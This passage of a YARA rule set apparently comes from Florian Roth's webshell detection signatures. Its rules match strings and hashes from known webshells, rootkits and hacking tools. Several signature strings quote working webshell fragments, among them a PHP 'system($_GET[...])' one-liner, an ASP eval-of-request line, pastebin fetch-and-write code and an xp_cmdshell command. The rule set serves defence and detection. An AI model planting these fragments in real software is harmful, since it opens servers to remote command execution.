\" title=\"<%=SubFolder.Name%>\"> \" title=\"<%=File.Name%>\"> \" align=\"right\"><%=Attributes(SubFolder.Attributes)%>\">"
condition:
all of them
}
rule byloader {
meta:
description = "Webshells Auto-generated - file byloader.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "0f0d6dc26055653f5844ded906ce52df"
strings:
$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
$s1 = "Failure ... Access is Denied !"
$s2 = "NTFS Disk Driver Checking Service"
$s3 = "Dumping Description to Registry..."
$s4 = "Opening Service .... Failure !"
condition:
all of them
}
rule shelltools_g0t_root_Fport {
meta:
description = "Webshells Auto-generated - file Fport.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "dbb75488aa2fa22ba6950aead1ef30d5"
strings:
$s4 = "Copyright 2000 by Foundstone, Inc."
$s5 = "You must have administrator privileges to run fport - exiting..."
condition:
all of them
}
rule BackDooR__fr_ {
meta:
description = "Webshells Auto-generated - file BackDooR (fr).php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "a79cac2cf86e073a832aaf29a664f4be"
strings:
$s3 = "print(\"Exploit include "
condition:
all of them
}
rule FSO_s_ntdaddy {
meta:
description = "Webshells Auto-generated - file ntdaddy.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
strings:
$s1 = ""
condition:
all of them
}
rule FSO_s_c99 {
meta:
description = "Webshells Auto-generated - file c99.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "5f9ba02eb081bba2b2434c603af454d0"
strings:
$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
condition:
all of them
}
rule rknt_zip_Folder_RkNT {
meta:
description = "Webshells Auto-generated - file RkNT.dll"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "5f97386dfde148942b7584aeb6512b85"
strings:
$s0 = "PathStripPathA"
$s1 = "`cLGet!Addr%"
$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
$s3 = "oQToOemBuff* <="
$s4 = "ionCdunAsw[Us'"
$s6 = "CreateProcessW: %S"
$s7 = "ImageDirectoryEntryToData"
condition:
all of them
}
rule dbgntboot {
meta:
description = "Webshells Auto-generated - file dbgntboot.dll"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "4d87543d4d7f73c1529c9f8066b475ab"
strings:
$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
$s3 = "sth junk the M$ Wind0wZ retur"
condition:
all of them
}
rule PHP_shell {
meta:
description = "Webshells Auto-generated - file shell.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
strings:
$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
condition:
all of them
}
rule hxdef100 {
meta:
description = "Webshells Auto-generated - file hxdef100.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "55cc1769cef44910bd91b7b73dee1f6c"
strings:
$s0 = "RtlAnsiStringToUnicodeString"
$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
condition:
all of them
}
rule rdrbs100 {
meta:
description = "Webshells Auto-generated - file rdrbs100.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "7c752bcd6da796d80a6830c61a632bff"
strings:
$s3 = "Server address must be IP in A.B.C.D format."
$s4 = " mapped ports in the list. Currently "
condition:
all of them
}
rule Mithril_Mithril {
meta:
description = "Webshells Auto-generated - file Mithril.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "017191562d72ab0ca551eb89256650bd"
strings:
$s0 = "OpenProcess error!"
$s1 = "WriteProcessMemory error!"
$s4 = "GetProcAddress error!"
$s5 = "HHt`HHt\\"
$s6 = "Cmaudi0"
$s7 = "CreateRemoteThread error!"
$s8 = "Kernel32"
$s9 = "VirtualAllocEx error!"
condition:
all of them
}
rule hxdef100_2 {
meta:
description = "Webshells Auto-generated - file hxdef100.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
strings:
$s0 = "\\\\.\\mailslot\\hxdef-rkc000"
$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
condition:
all of them
}
rule Release_dllTest {
meta:
description = "Webshells Auto-generated - file dllTest.dll"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "76a59fc3242a2819307bb9d593bef2e0"
strings:
$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
$s1 = "0 0&00060K0R0X0f0l0q0w0"
$s2 = ": :$:(:,:0:4:8:D:`=d="
$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
$s6 = "0)0O0\\0a0o0\"1E1P1q1"
$s7 = "<.\".ws(2).\"HDD Free : \".view_size($free).\" HDD Total : \".view_"
condition:
all of them
}
rule Mithril_v1_45_dllTest {
meta:
description = "Webshells Auto-generated - file dllTest.dll"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "1b9e518aaa62b15079ff6edb412b21e9"
strings:
$s3 = "syspath"
$s4 = "\\Mithril"
$s5 = "--list the services in the computer"
condition:
all of them
}
rule dbgiis6cli {
meta:
description = "Webshells Auto-generated - file dbgiis6cli.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "3044dceb632b636563f66fee3aaaf8f3"
strings:
$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
$s5 = "###command:(NO more than 100 bytes!)"
condition:
all of them
}
rule remview_2003_04_22 {
meta:
description = "Webshells Auto-generated - file remview_2003_04_22.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "17d3e4e39fbca857344a7650f7ea55e3"
strings:
$s1 = "\"\".mm(\"Eval PHP code\").\" (\".mm(\"don't type\").\" \\\"<?\\\""
condition:
all of them
}
rule FSO_s_test {
meta:
description = "Webshells Auto-generated - file test.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "82cf7b48da8286e644f575b039a99c26"
strings:
$s0 = "$yazi = \"test\" . \"\\r\\n\";"
$s2 = "fwrite ($fp, \"$yazi\");"
condition:
all of them
}
rule Debug_cress {
meta:
description = "Webshells Auto-generated - file cress.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "36a416186fe010574c9be68002a7286a"
strings:
$s0 = "\\Mithril "
$s4 = "Mithril.exe"
condition:
all of them
}
rule webshell {
meta:
description = "Webshells Auto-generated - file webshell.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "f2f8c02921f29368234bfb4d4622ad19"
strings:
$s0 = "RhViRYOzz"
$s1 = "d\\O!jWW"
$s2 = "bc!jWW"
$s3 = "0W[&{l"
$s4 = "[INhQ@\\"
condition:
all of them
}
rule FSO_s_EFSO_2 {
meta:
description = "Webshells Auto-generated - file EFSO_2.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "a341270f9ebd01320a7490c12cb2e64c"
strings:
$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
condition:
all of them
}
rule thelast_index3 {
meta:
description = "Webshells Auto-generated - file index3.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "cceff6dc247aaa25512bad22120a14b4"
strings:
$s5 = "$err = \"Your Name Not Entered! Sorry, \\\"Your Name\\\" field is r"
condition:
all of them
}
rule adjustcr {
meta:
description = "Webshells Auto-generated - file adjustcr.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "17037fa684ef4c90a25ec5674dac2eb6"
strings:
$s0 = "$Info: This file is packed with the UPX executable packer $"
$s2 = "$License: NRV for UPX is distributed under special license $"
$s6 = "AdjustCR Carr"
$s7 = "ION\\System\\FloatingPo"
condition:
all of them
}
rule FeliksPack3___PHP_Shells_xIShell {
meta:
description = "Webshells Auto-generated - file xIShell.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "997c8437c0621b4b753a546a53a88674"
strings:
$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"
[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
condition:
all of them
}
rule xssshell_save {
meta:
description = "Webshells Auto-generated - file save.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "865da1b3974e940936fe38e8e1964980"
strings:
$s4 = "RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID"
$s5 = "VictimID = fm_NStr(Victims(i))"
condition:
all of them
}
rule screencap {
meta:
description = "Webshells Auto-generated - file screencap.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "51139091dea7a9418a50f2712ea72aa6"
strings:
$s0 = "GetDIBColorTable"
$s1 = "Screen.bmp"
$s2 = "CreateDCA"
condition:
all of them
}
rule FSO_s_phpinj_2 {
meta:
description = "Webshells Auto-generated - file phpinj.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "dd39d17e9baca0363cc1c3664e608929"
strings:
$s9 = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO"
condition:
all of them
}
rule ZXshell2_0_rar_Folder_zxrecv {
meta:
description = "Webshells Auto-generated - file zxrecv.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "5d3d12a39f41d51341ef4cb7ce69d30f"
strings:
$s0 = "RyFlushBuff"
$s1 = "teToWideChar^FiYP"
$s2 = "mdesc+8F D"
$s3 = "\\von76std"
$s4 = "5pur+virtul"
$s5 = "- Kablto io"
$s6 = "ac#f{lowi8a"
condition:
all of them
}
rule FSO_s_ajan {
meta:
description = "Webshells Auto-generated - file ajan.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "22194f8c44524f80254e1b5aec67b03e"
strings:
$s4 = "entrika.write \"BinaryStream.SaveToFile"
condition:
all of them
}
rule c99shell {
meta:
description = "Webshells Auto-generated - file c99shell.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "90b86a9c63e2cd346fe07cea23fbfc56"
strings:
$s0 = "<br />Input URL: <input name=\\\"uploadurl\\\" type=\\\"text\\\"&"
condition:
all of them
}
rule phpspy_2005_full {
meta:
description = "Webshells Auto-generated - file phpspy_2005_full.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "d1c69bb152645438440e6c903bac16b2"
strings:
$s7 = "echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco"
condition:
all of them
}
rule FSO_s_zehir4_2 {
meta:
description = "Webshells Auto-generated - file zehir4.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "5b496a61363d304532bcf52ee21f5d55"
strings:
$s4 = "\"Program Files\\Serv-u\\Serv"
condition:
all of them
}
rule httpdoor {
meta:
description = "Webshells Auto-generated - file httpdoor.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "6097ea963455a09474471a9864593dc3"
strings:
$s4 = "''''''''''''''''''DaJKHPam"
$s5 = "o,WideCharR]!n]"
$s6 = "HAutoComplete"
$s7 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch"
condition:
all of them
}
rule FSO_s_indexer_2 {
meta:
description = "Webshells Auto-generated - file indexer.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "135fc50f85228691b401848caef3be9e"
strings:
$s5 = "<td>Nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>"
condition:
all of them
}
rule HYTop_DevPack_2005 {
meta:
description = "Webshells Auto-generated - file 2005.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
strings:
$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"
$s8 = "scrollbar-darkshadow-color:#9C9CD3;"
$s9 = "scrollbar-face-color:#E4E4F3;"
condition:
all of them
}
rule _root_040_zip_Folder_deploy {
meta:
description = "Webshells Auto-generated - file deploy.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "2c9f9c58999256c73a5ebdb10a9be269"
strings:
$s5 = "halon synscan 127.0.0.1 1-65536"
$s8 = "Obviously you replace the ip address with that of the target."
condition:
all of them
}
rule by063cli {
meta:
description = "Webshells Auto-generated - file by063cli.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "49ce26eb97fd13b6d92a5e5d169db859"
strings:
$s2 = "#popmsghello,are you all right?"
$s4 = "connect failed,check your network and remote ip."
condition:
all of them
}
rule icyfox007v1_10_rar_Folder_asp {
meta:
description = "Webshells Auto-generated - file asp.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "2c412400b146b7b98d6e7755f7159bb9"
strings:
$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
condition:
all of them
}
rule FSO_s_EFSO_2_2 {
meta:
description = "Webshells Auto-generated - file EFSO_2.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "a341270f9ebd01320a7490c12cb2e64c"
strings:
$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
condition:
all of them
}
rule byshell063_ntboot_2 {
meta:
description = "Webshells Auto-generated - file ntboot.dll"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
strings:
$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
condition:
all of them
}
rule u_uay {
meta:
description = "Webshells Auto-generated - file uay.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "abbc7b31a24475e4c5d82fc4c2b8c7c4"
strings:
$s1 = "exec \"c:\\WINDOWS\\System32\\freecell.exe"
$s9 = "SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
condition:
1 of them
}
rule bin_wuaus {
meta:
description = "Webshells Auto-generated - file wuaus.dll"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "46a365992bec7377b48a2263c49e4e7d"
strings:
$s1 = "9(90989@9V9^9f9n9v9"
$s2 = ":(:,:0:4:8:C:H:N:T:Y:_:e:o:y:"
$s3 = ";(=@=G=O=T=X=\\="
$s4 = "TCP Send Error!!"
$s5 = "1\"1;1X1^1e1m1w1~1"
$s8 = "=$=)=/=<=Y=_=j=p=z="
condition:
all of them
}
rule pwreveal {
meta:
description = "Webshells Auto-generated - file pwreveal.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "b4e8447826a45b76ca45ba151a97ad50"
strings:
$s0 = "*<Blank - no es"
$s3 = "JDiamondCS "
$s8 = "sword set> [Leith=0 bytes]"
$s9 = "ION\\System\\Floating-"
condition:
all of them
}
rule shelltools_g0t_root_xwhois {
meta:
description = "Webshells Auto-generated - file xwhois.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "0bc98bd576c80d921a3460f8be8816b4"
strings:
$s1 = "rting! "
$s2 = "aTypCog("
$s5 = "Diamond"
$s6 = "r)r=rQreryr"
condition:
all of them
}
rule vanquish_2 {
meta:
description = "Webshells Auto-generated - file vanquish.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "2dcb9055785a2ee01567f52b5a62b071"
strings:
$s2 = "Vanquish - DLL injection failed:"
condition:
all of them
}
rule down_rar_Folder_down {
meta:
description = "Webshells Auto-generated - file down.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "db47d7a12b3584a2e340567178886e71"
strings:
$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\" & Snet.ComputerName &"
condition:
all of them
}
rule cmdShell {
meta:
description = "Webshells Auto-generated - file cmdShell.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "8a9fef43209b5d2d4b81dfbb45182036"
strings:
$s1 = "if cmdPath=\"wscriptShell\" then"
condition:
all of them
}
rule ZXshell2_0_rar_Folder_nc {
meta:
description = "Webshells Auto-generated - file nc.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "2cd1bf15ae84c5f6917ddb128827ae8b"
strings:
$s0 = "WSOCK32.dll"
$s1 = "?bSUNKNOWNV"
$s7 = "p@gram Jm6h)"
$s8 = "ser32.dllCONFP@"
condition:
all of them
}
rule portlessinst {
meta:
description = "Webshells Auto-generated - file portlessinst.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "74213856fc61475443a91cd84e2a6c2f"
strings:
$s2 = "Fail To Open Registry"
$s3 = "f<-WLEggDr\""
$s6 = "oMemoryCreateP"
condition:
all of them
}
rule SetupBDoor {
meta:
description = "Webshells Auto-generated - file SetupBDoor.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "41f89e20398368e742eda4a3b45716b6"
strings:
$s1 = "\\BDoor\\SetupBDoor"
condition:
all of them
}
rule phpshell_3 {
meta:
description = "Webshells Auto-generated - file phpshell.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
strings:
$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
$s5 = " echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
condition:
all of them
}
rule BIN_Server {
meta:
description = "Webshells Auto-generated - file Server.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "1d5aa9cbf1429bb5b8bf600335916dcd"
strings:
$s0 = "configserver"
$s1 = "GetLogicalDrives"
$s2 = "WinExec"
$s4 = "fxftest"
$s5 = "upfileok"
$s7 = "upfileer"
condition:
all of them
}
rule HYTop2006_rar_Folder_2006 {
meta:
description = "Webshells Auto-generated - file 2006.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "c19d6f4e069188f19b08fa94d44bc283"
strings:
$s6 = "strBackDoor = strBackDoor "
condition:
all of them
}
rule r57shell_3 {
meta:
description = "Webshells Auto-generated - file r57shell.php"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "87995a49f275b6b75abe2521e03ac2c0"
strings:
$s1 = "<b>\".$_POST['cmd']"
condition:
all of them
}
rule HDConfig {
meta:
description = "Webshells Auto-generated - file HDConfig.exe"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "7d60e552fdca57642fd30462416347bd"
strings:
$s0 = "An encryption key is derived from the password hash. "
$s3 = "A hash object has been created. "
$s4 = "Error during CryptCreateHash!"
$s5 = "A new key container has been created."
$s6 = "The password has been added to the hash. "
condition:
all of them
}
rule FSO_s_ajan_2 {
meta:
description = "Webshells Auto-generated - file ajan.asp"
author = "Yara Bulk Rule Generator by Florian Roth"
hash = "22194f8c44524f80254e1b5aec67b03e"
strings:
$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"
$s3 = "/file.zip"
condition:
all of them
}
rule Webshell_and_Exploit_CN_APT_HK : Webshell
{
meta:
author = "Florian Roth"
description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
date = "10.10.2014"
score = 50
strings:
$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
condition:
$a0 or ( all of ($s*) )
}
rule JSP_Browser_APT_webshell {
meta:
description = "VonLoesch JSP Browser used as web shell by APT groups - jsp File browser 1.1a"
author = "F.Roth"
date = "10.10.2014"
score = 60
strings:
$a1a = "private static final String[] COMMAND_INTERPRETER = {\"" ascii
$a1b = "cmd\", \"/C\"}; // Dos,Windows" ascii
$a2 = "Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));" ascii
$a3 = "ret.append(\"!!!! Process has timed out, destroyed !!!!!\");" ascii
condition:
all of them
}
rule JSP_jfigueiredo_APT_webshell {
meta:
description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
author = "F.Roth"
date = "12.10.2014"
score = 60
reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
strings:
$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
condition:
all of them
}
rule JSP_jfigueiredo_APT_webshell_2 {
meta:
description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
author = "F.Roth"
date = "12.10.2014"
score = 60
reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"
strings:
$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii
$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii
$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii
$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii
condition:
all of ($a*) or all of ($s*)
}
rule AJAX_FileUpload_webshell {
meta:
description = "AJAX JS/CSS components providing web shell by APT groups"
author = "F.Roth"
date = "12.10.2014"
score = 75
reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/ajaxfileupload.js"
strings:
$a1 = "var frameId = 'jUploadFrame' + id;" ascii
$a2 = "var form = jQuery('<form action=\"\" method=\"POST\" name=\"' + formId + '\" id=\"' + formId + '\" enctype=\"multipart/form-data\"></form>');" ascii
$a3 = "jQuery(\"<div>\").html(data).evalScripts();" ascii
condition:
all of them
}
rule Webshell_Insomnia {
meta:
description = "Insomnia Webshell - file InsomniaShell.aspx"
author = "Florian Roth"
reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"
date = "2014/12/09"
hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"
score = 80
strings:
$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii
$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii
$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii
$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii
$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii
$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii
$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii
$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii
condition:
3 of them
}
rule HawkEye_PHP_Panel {
meta:
description = "Detects HawkEye Keyloggers PHP Panel"
author = "Florian Roth"
date = "2014/12/14"
score = 60
strings:
$s0 = "$fname = $_GET['fname'];" ascii fullword
$s1 = "$data = $_GET['data'];" ascii fullword
$s2 = "unlink($fname);" ascii fullword
$s3 = "echo \"Success\";" fullword ascii
condition:
all of ($s*) and filesize < 600
}
rule SoakSoak_Infected_Wordpress {
meta:
description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
reference = "http://goo.gl/1GzWUX"
author = "Florian Roth"
date = "2014/12/15"
score = 60
strings:
$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
$s1 = "function FuncQueueObject()" ascii fullword
$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
condition:
all of ($s*)
}
rule Pastebin_Webshell {
meta:
description = "Detects a web shell that downloads content from pastebin.com http://goo.gl/7dbyZs"
author = "Florian Roth"
score = 70
date = "13.01.2015"
reference = "http://goo.gl/7dbyZs"
strings:
$s0 = "file_get_contents(\"http://pastebin.com" ascii
$s1 = "xcurl('http://pastebin.com/download.php" ascii
$s2 = "xcurl('http://pastebin.com/raw.php" ascii
$x0 = "if($content){unlink('evex.php');" ascii
$x1 = "$fh2 = fopen(\"evex.php\", 'a');" ascii
$y0 = "file_put_contents($pth" ascii
$y1 = "echo \"<login_ok>" ascii
$y2 = "str_replace('* @package Wordpress',$temp" ascii
condition:
1 of ($s*) or all of ($x*) or all of ($y*)
}
rule ASPXspy2 {
meta:
description = "Web shell - file ASPXspy2.aspx"
author = "Florian Roth"
reference = "not set"
date = "2015/01/24"
hash = "5642387d92139bfe9ae11bfef6bfe0081dcea197"
strings:
$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii
$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
$s3 = "Process[] p=Process.GetProcesses();" fullword ascii
$s4 = "Response.Cookies.Add(new HttpCookie(vbhLn,Password));" fullword ascii
$s5 = "[DllImport(\"kernel32.dll\",EntryPoint=\"GetDriveTypeA\")]" fullword ascii
$s6 = "<p>ConnString : <asp:TextBox id=\"MasR\" style=\"width:70%;margin:0 8px;\" CssCl" ascii
$s7 = "ServiceController[] kQmRu=System.ServiceProcess.ServiceController.GetServices();" fullword ascii
$s8 = "Copyright © 2009 Bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_bla" ascii
$s10 = "Response.AddHeader(\"Content-Disposition\",\"attachment;filename=\"+HttpUtility." ascii
$s11 = "nxeDR.Command+=new CommandEventHandler(this.iVk);" fullword ascii
$s12 = "<%@ import Namespace=\"System.ServiceProcess\"%>" fullword ascii
$s13 = "foreach(string innerSubKey in sk.GetSubKeyNames())" fullword ascii
$s17 = "Response.Redirect(\"http://www.rootkit.net.cn\");" fullword ascii
$s20 = "else if(Reg_Path.StartsWith(\"HKEY_USERS\"))" fullword ascii
condition:
6 of them
}
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-01-11
Identifier: Web Shell Repo
Reference: https://github.com/nikicat/web-malware-collection
*/
rule Webshell_27_9_c66_c99 {
meta:
description = "Detects Webshell - rule generated from from files 27.9.txt, c66.php, c99-shadows-mod.php, c99.php ..."
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
hash2 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
hash3 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
hash4 = "80ec7831ae888d5603ed28d81225ed8b256c831077bb8feb235e0a1a9b68b748"
hash5 = "6ce99e07aa98ba6dc521c34cf16fbd89654d0ba59194878dffca857a4c34e57b"
hash6 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
hash7 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
hash8 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
hash9 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
hash10 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
strings:
$s4 = "if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}" fullword ascii
$s6 = "@extract($_REQUEST[\"c99shcook\"]);" fullword ascii
$s7 = "if (!function_exists(\"c99_buff_prepare\"))" fullword ascii
condition:
filesize < 685KB and 1 of them
}
rule Webshell_acid_AntiSecShell_3 {
meta:
description = "Detects Webshell Acid"
author = "Florian Roth"
reference = "https://github.com/nikicat/web-malware-collection"
date = "2016-01-11"
score = 70
hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
hash3 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
hash4 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
hash5 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
hash6 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
hash7 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
hash8 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
hash9 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
hash10 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
hash11 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
hash12 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
hash13 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
